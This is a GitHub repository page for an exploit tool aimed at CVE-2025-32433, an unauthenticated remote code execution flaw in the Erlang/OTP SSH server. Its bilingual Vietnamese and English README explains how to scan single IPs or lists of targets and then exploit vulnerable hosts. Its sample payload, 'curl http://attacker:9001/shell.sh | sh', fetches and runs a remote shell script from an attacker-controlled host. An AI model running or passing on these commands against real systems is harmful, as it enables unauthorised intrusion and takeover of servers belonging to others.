Skip to content

Yuri08loveElaina/CVE-2025-32433-Erlang-OTP-SSH-Pre-Auth-RCE-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

VIETNAMESE

  • Cách sử dụng

  • Quét một IP:

python3 elaina_cve2025_32433.py --target 192.168.1.10

  • Quét nhiều IP từ file:

python3 elaina_cve2025_32433.py --file targets.txt

  • Khai thác nếu phát hiện lỗ hổng:

python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit

  • Tùy chọn payload:

python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"

  • Xuất ra JSON:

python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json

ENGLISH

  • How to use

  • Scan single IP: python3 elaina_cve2025_32433.py --target 192.168.1.10

  • Scan multiple IPs from file:

python3 elaina_cve2025_32433.py --file targets.txt

  • Exploit if vulnerability is found:

python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit

  • Payload options:

python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"

  • Output to JSON:

python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json

About

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages